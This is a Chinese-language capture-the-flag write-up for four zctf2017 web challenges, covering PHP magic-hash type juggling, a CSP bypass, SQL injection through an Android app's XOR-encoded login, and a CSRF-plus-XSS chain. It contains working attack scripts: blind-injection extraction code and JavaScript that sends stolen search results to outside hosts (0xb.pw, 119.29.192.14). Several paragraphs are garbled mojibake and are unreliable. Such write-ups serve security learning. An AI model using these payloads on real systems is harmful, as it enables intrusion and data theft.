
zctf2017 writeup

2017/02/27


2月末打了一下zctf，说实话题目出的不好，所有的web题目都是假题目，稍微记录一下吧

web1

没什么意思

存在

.index.php.swp（Vim 的交换文件留在了 web 目录里，直接泄露了 index.php 的源码）
<?php
// Challenge source, recovered from the leaked Vim swap file (.index.php.swp).
// The flag must differ from the secret and must contain "zctf" ...
$flag = $_GET['flag'];
if ($flag != '15562') {
if (strstr($flag, 'zctf')) {
// ... and a 16-char slice of its md5 must loosely (==) equal the same slice
// of md5('15562'). PHP compares two numeric-looking strings numerically, so
// "0e" followed only by digits evaluates to 0 ("magic hash" / type
// juggling). The write-up reports the target slice itself starts with "0e",
// so any input whose slice is "0e" + 14 digits passes. A strict comparison
// (===) would close this.
if (substr(md5($flag),8,16) == substr(md5('15562'),8,16)) {
die('ZCTF{#########}');
}
}##
}
die('ha?')
?>

直接写脚本
爆破一下

<?php
// Brute force: find a numeric prefix for which "<n>zctf" collides with the
// target slice under PHP's loose (==) comparison. This works precisely
// because both sides are "0e<digits>" strings, which == treats as 0 == 0.
// md5('15562') does not change, so compute the target slice once.
$target = substr(md5('15562'), 8, 16);
for ($n = 1; $n <= 999999; $n++) {
    $candidate = $n . "zctf";
    $slice = substr(md5($candidate), 8, 16);
    if ($slice == $target) {
        echo $candidate . ":";
        echo $slice . "\n";
    }
}
// Note: this prints the last candidate tried (999999zctf), not a hit —
// the hits are the "name:slice" lines above.
echo $candidate;
?>

因为是 0e 开头的，爆破前两位就可以（PHP 的 == 对两个形如数字的字符串按数值比较，"0e" 后面全是数字的串会被当成 0，所以只要 md5 第 9 到 24 位是 0e 加 14 个数字，就能和目标"相等"——这里的目标 substr(md5('15562'),8,16) 正是这种形式；服务端改用 === 做严格比较即可避免）

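import hashlib


def find_magic_hash(prefix='zctf', limit=10000000, lo=8, hi=24):
    """Find ``prefix + str(i)`` whose md5 hex digest is a PHP "magic hash"
    in the window ``[lo:hi]``: ``"0e"`` followed only by decimal digits.

    PHP's loose comparison (``==``) converts such a string to the number 0,
    so it compares equal to any other ``0e<digits>`` string. That is what
    lets an unrelated value pass the challenge's
    ``substr(md5($flag),8,16) == substr(md5('15562'),8,16)`` check.

    Args:
        prefix: Fixed text every candidate starts with (the challenge
            requires the value to contain ``zctf``).
        limit: Number of candidates to try, ``prefix+'0'`` .. ``prefix+str(limit-1)``.
        lo: Start of the digest slice that must be a magic hash.
        hi: End (exclusive) of that slice. Defaults mirror ``substr(..., 8, 16)``.

    Returns:
        The first matching candidate, or ``None`` if none is found within
        ``limit`` tries.
    """
    for i in range(limit):
        candidate = prefix + str(i)
        window = hashlib.md5(candidate.encode('ascii')).hexdigest()[lo:hi]
        # At least one digit after "0e" is required; any hex letter (a-f)
        # breaks PHP's numeric interpretation of the string.
        if window[:2] == '0e' and window[2:].isdigit():
            return candidate
    return None


if __name__ == '__main__':
    # The original script was missing `import hashlib` and lost its indentation.
    print(find_magic_hash())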

web2

稍微翻翻站，其实没什么功能，只有contact.php这里是一个有返回的功能，其他的都是直接跳 # 的，那么问题就是这个了

http://58.213.63.30:10006/a0f1b29db350fdac2ad6dc4cb92dbd2b/message.php
Name=dsafim<link>gafsadsa&Email=123%40qq.com&Team=1321321&textarea=321421321

CSP

Content-Security-Policy
default-src 'self'; script-src 'self' 'unsafe-inline';

杩欓鍏跺疄鏈澶х殑闂灏辨槸澶繃涓ユ牸鐨勮繃婊や互鍙婄洸娴嬶紝闄や簡textarea鏈夊垽鏂互澶栵紝鍏朵粬鐨勯兘娌′粈涔堟娴嬶紝浜嬪疄鏄彧璁板綍浜嗚繖涓,script寰堥殢渚匡紝浣嗚繃婊や簡锛

eval
document
location
href
window
src
svg
img
open
callback
单双引号
鎷彿
反斜杠
$\#

闂鐨勬牳蹇冨叾瀹炴槸娌℃湁鎷彿锛屾病鏈変换浣曞姙娉曠粫杩囦紶鍏ュ瓧绗︿覆锛屼篃娌″姙娉曟墦cookie锛屽悗鏉ユ病鍔炴硶鎵惧埌浜嗛暱鐭煭鐨刡ypass csp鏂瑰紡锛岃幏鍙栬姹傜殑鏃跺欏彂鐜扮洿鎺ユ嬁鍒颁簡flag鈥

payload

</textarea><script>//@ sourceMappingURL=http://0xb.pw</script>
zctf%7Be042d9c03263521c86025a4b47b03055%7D

web3 eazy apk

分析apk，找到 http://58.213.63.30:10005/

分析出加密的方式，写个脚本

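def encode(name, key="1470" * 10):
    """Reproduce the APK's client-side "encryption" of the username field.

    The app reverses the string, XORs each byte with the repeating key
    ``1470`` and hex-encodes the result. A constant key shipped inside the
    APK gives no confidentiality: XOR is its own inverse, so anyone with the
    key can decode the traffic, and the server still receives
    attacker-controlled text that it apparently concatenates into SQL
    (hence the ``' AND select 1#`` probe below).

    Args:
        name: Plaintext to encode (e.g. an SQL injection probe).
        key: XOR key; cycled when shorter than ``name`` (the original
            script raised ``IndexError`` past the key's length).

    Returns:
        Lower-case hex string, two characters per input byte.

    Raises:
        ValueError: if ``key`` is empty.
    """
    if not key:
        raise ValueError("key must not be empty")
    key_len = len(key)
    return ''.join(
        '%02x' % (ord(ch) ^ ord(key[i % key_len]))
        for i, ch in enumerate(name[::-1])
    )


if __name__ == '__main__':
    # Probe used in the write-up to test whether username reaches SQL.
    print(encode("' AND select 1#"))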

猜测是sql注入，但是有点儿麻烦的是union select和括号被过滤了，很难受。

后来查到可以用 union distinct select 的方式绕过对 union select 的过滤，然后使用 order by 盲注

admin'union distinct select 1,'test','3' order by 3 desc#
如果username返回的是admin，那么自己构造的password小于admin的密码；
大于的话就会返回test

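# Blind extraction of admin's password via an ORDER BY oracle.
# Recovered value: 5AF1AB27B1BE8BB8E39BDF98CD2CFCE4
TARGET_URL = "http://58.213.63.30:10005"
XOR_KEY = "1470"


def encode_name(name, key=XOR_KEY):
    """Apply the APK's reverse-then-XOR-then-hex transform to ``name``.

    The key is cycled, so names of any length encode (the original
    multiplied the key by 100 to the same end).
    """
    key_len = len(key)
    return ''.join(
        '%02x' % (ord(ch) ^ ord(key[i % key_len]))
        for i, ch in enumerate(name[::-1])
    )


def remote_oracle(url):
    """Build an oracle answering "does ``candidate`` sort above admin's password?"

    The injected username is
    ``admin'union distinct select 1,'test','<candidate>' order by 3 desc #``:
    ``union distinct`` slips past the filter on ``union select`` and the
    payload uses no parentheses. ``ORDER BY 3 DESC`` puts the row with the
    larger third column (the password) first; the app reflects the first
    row's username, so ``test`` in the response means the injected password
    sorts above admin's.
    """
    import requests  # lazy: only the live attack needs it

    def oracle(candidate):
        name = ("admin'union distinct select 1,'test','" + candidate
                + "' order by 3 desc #")
        r = requests.post(url=url, data={'username': encode_name(name), 'password': '123'})
        # r.text rather than r.content: the latter is bytes on Python 3.
        return "test" in r.text

    return oracle


def extract_password(url=TARGET_URL, length=32, oracle=None, alphabet=range(33, 128)):
    """Recover admin's password one character at a time.

    For each position, candidates ``prefix + chr(j)`` are tried in ascending
    order; the first one the oracle reports as "greater" means the real
    character is ``chr(j - 1)`` (with an equal prefix the comparison is
    decided by that character, and when it is equal the shorter candidate
    sorts lower). Ordering is the server's collation; MySQL's default is
    case-insensitive, which is harmless for a hex digest.

    Args:
        url: Login endpoint, used only by the default HTTP oracle.
        length: Characters to recover. 32 for an md5 hex digest; the
            original looped 33 times and so appended a bogus trailing space.
        oracle: ``callable(candidate) -> bool``; defaults to the live HTTP
            probe. Injectable so the search logic can be tested offline.
        alphabet: Ordinals to try, ascending. Must extend one past the
            largest possible character or that character can never be
            detected (the original stopped at 126, so '~' was unreachable).

    Returns:
        The recovered password; shorter than ``length`` if a position could
        not be resolved.
    """
    if oracle is None:
        oracle = remote_oracle(url)
    password = ""
    for _ in range(length):
        found = None
        for j in alphabet:
            if oracle(password + chr(j)):
                found = chr(j - 1)
                break
        if found is None:
            # No candidate sorted above the real value: stop instead of
            # continuing with a stale prefix as the original did.
            break
        password += found
    return password


if __name__ == '__main__':
    print(extract_password())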

密码 5AF1AB27B1BE8BB8E39BDF98CD2CFCE4
拿 cmd5 查
密码明文: CleverBoy123
加密之后

username="5f5d5a5450"
password="020606495e76455547515b73"

手机apk登陆后发现是发送邮件的，抓包

http://58.213.63.30:10005/mail.php
body=45475244&password=020606495e76455547515b73&title=45475244&username=5f5d5a5450&mail=521a557050

理所当然认为是phpmailer的cve，只是想了很久怎么写个webshell进去，可惜没想到随便测试了一下能不能写入文件，结果就getflag了…

以前写过分析文章，随便一个payload都可以
http://lorexxar.cn/2016/12/28/cve-2016-10030/

web4 时间

功能稍微有点儿多的

分析一下

1、profile.php可以设置头像，这里内容不受影响，可以放任何东西

http://58.213.63.30:10003/uploads/0df8ddb2fee38858a4ddb8307d77f95baf869147.png
HTTP/1.1 200 OK
Date: Sun, 26 Feb 2017 04:52:31 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Sun, 26 Feb 2017 04:50:09 GMT
ETag: "9-54967b28d17fd"
Accept-Ranges: bytes
Content-Length: 9
Content-Type: image/png

2、note.php地方可以添加什么东西，但是需要csrftoken，如果可以写js的话，可以绕

ps：只显示6条

3、http://58.213.63.30:10003/search.php?keywords=1 可以查询，但是返回只有数目

ps：这里是like的语法，也就是说可以逐位地跑出一些内容

4、bugsubmit猜测有几个利用点，一个是url，可能会被点击，一个是图片，可以加外链的，但是好像什么都没发生（这里坑了超久，开始测试的时候，这里链接是没人点击的…很晚了测试的时候无意中发现有人点击…导致也就来不及写payload了）

5、cookie是httponly

nikename和address可以xss，复写绕过，这样尖括号就不会被转义了（不知道这里咋写的…单纯传入尖括号会被转义）

<scrsvgipt>alert(1)</scrsvgipt>
<scrsvgipt src=//119.29.192.14/1></scrsvgipt>

鍙互闅忔剰寮鐏紝浣嗘槸涓嶈兘璁╁埆浜虹湅鍒帮紝鎵浠ラ渶瑕佷竴涓猚srf鏉ヨ鍒汉淇敼鑷繁鐨勪釜浜轰俊鎭

bugsubmit的上传图片是假的，直接转成了img标签

后来发现提交的链接是会被点击的，那么思路很简单了，就是构造一个自动提交来修改查看人的个人信息，然后执行js

payload

<html>
<head>
<!-- CSRF page: whoever opens it (here, the admin who clicks the submitted
     link) silently POSTs the profile form to checkProfile.php. A plain
     HTML form submission is sent cross-origin with the victim's cookies,
     so the endpoint apparently has no CSRF token (note.php does, per the
     write-up). -->
<script src="jquery-3.1.0.min.js"></script>
</head>
<body>
<form action="http://58.213.63.30:10003/checkProfile.php" method="POST" id="profile" enctype="multipart/form-data">
<input class="form-control" name="nick" id="nick" />
<input class="form-control" name="age" id="age" />
<input class="form-control" name="address" id="address" />
</form>
<script>
// Double-write bypass: the filter appears to strip the keyword "script"
// once, so "scriscriptpt" collapses to "script" after filtering. nick
// becomes an opening <script src=http://119.29.192.14/2> tag that loads
// the attacker's JS; address supplies the closing </script>. The
// backslashes inside these JS string literals are no-ops (\< is just <).
$("form input:eq(0)").val("\<scriscriptpt src=http:\/\/119.29.192.14\/2\>");
$("form input:eq(2)").val('\<\/scrscriptipt\>');
$("form").submit();
</script>
</body>
</html>

这payload是打到后台后随便找了个人扒的，这部分很简单就不赘述了

鍏抽敭鏄鎵ц浠涔坖s鍛紝浠旂粏鐪嬬湅涓婇潰鐨勪俊鎭紝cookie鏄痟ttponly鐨勶紝鎵浠ユ垜浠病鍔炴硶鑾峰彇cookie锛岄偅涔坒lag鍙湁鍙兘鏄瓨鍦╪ote涓殑浜嗭紝鑰宯ote涓彧鏄剧ず6鏉★紙鍚摑鐚笀鍌呰杩欓噷鏄瀬涔愬噣鍦熲.锛夛紝search澶勫彲浠ユ煡璇紝浣嗘槸闇瑕侀愪綅璺戯紝杩欐牱灏遍渶瑕佷竴涓剼鏈簡鈥(杩欓噷鏈変釜鏂扮殑闂锛屼篃灏辨槸瀵艰嚧鎴戞病鏈夎幏寰梖lag鐨勬渶澶ч棶棰樷﹁剼鏈墽琛屾椂闂存湁闄愶紝鎴戜娇鐢ㄤ簡璺戝畬杩斿洖鐨勬柟寮忊︾粨鏋滀竴娆¢兘娌℃敹鍒帮紝鎴戜互涓烘槸鍒殑闂锛岃繕璺戜簡涓涓媙ote鐨勬潯鏁)

杩欎釜鏄繑鍥炴暟鐩殑payload
// Count-exfiltration probe. A "%" keyword matches every row in a LIKE
// filter, so the response carries the total count; 30 bytes around the
// hand-picked offset 2400 are relayed to the attacker's host in the query
// string, since the result is only visible inside the victim's browser.
(function () {
    var searchUrl = 'http://58.213.63.30:10003/search.php?keywords=%';
    var sink = 'http://0xb.pw?a=';

    function relay(body) {
        var fragment = body.substr(2400, 30);
        $.get(sink + escape(fragment));
    }

    $.get(searchUrl, relay);
})();

还有打flag的payload

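/**
 * Recover a string one character at a time from a boolean search oracle.
 *
 * search.php only reveals whether a query matched (here judged from the HTTP
 * status), so each character costs one request, and every recovered
 * character is relayed out through `report` because the attacker cannot see
 * the victim's browser. The endpoint uses a LIKE filter, i.e. the candidate
 * matches as a *substring*: with an empty prefix the walk starts at the
 * alphabet's earliest character that occurs anywhere in the flag and only a
 * suffix is recovered. Pass `opts.prefix` (e.g. "zctf{") when the flag
 * format is known.
 *
 * @param {function(string): boolean} probe  true when `candidate` matches a row
 * @param {function(string): void} report    receives each recovered character
 * @param {{alphabet?: string, maxLen?: number, prefix?: string}} [opts]
 * @returns {string} recovered text, including `opts.prefix`
 */
function bruteFlag(probe, report, opts) {
    opts = opts || {};
    var alphabet = opts.alphabet || "0123456789abcdefghijklmnopqrstuvwxyz}";
    var maxLen = opts.maxLen === undefined ? 40 : opts.maxLen;
    var str = opts.prefix || "";

    // Separate counters: the original reused `i` for both loops, so every
    // inner search reset the outer one and the script never terminated.
    for (var pos = 0; pos < maxLen; pos++) {
        var hit = null;
        for (var k = 0; k < alphabet.length; k++) {
            if (probe(str + alphabet[k])) {
                hit = alphabet[k];
                break;
            }
        }
        if (hit === null) {
            // Nothing extends the match; the original appended "undefined"
            // (tab[tab.length]) here and carried on.
            break;
        }
        report(hit);
        str += hit;
        if (hit === "}") {
            break; // closing brace terminates the flag
        }
    }
    return str;
}

// Live oracle: synchronous jQuery GET. A 404 from search.php is taken to mean
// "no match", as in the original; confirm against the real endpoint, since
// the write-up only says the page returns a count.
function searchProbe(candidate) {
    var x = $.get('http://58.213.63.30:10003/search.php?keywords=' + candidate);
    return x.status != 404;
}

// Exfiltrate one character to the attacker-controlled host.
function exfil(ch) {
    $.get("http://0xb.pw/?a=" + escape(ch));
}

if (typeof $ !== "undefined") {
    $.ajaxSettings.async = false;
    bruteFlag(searchProbe, exfil);
}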

还没测试就关题目了…就这样吧
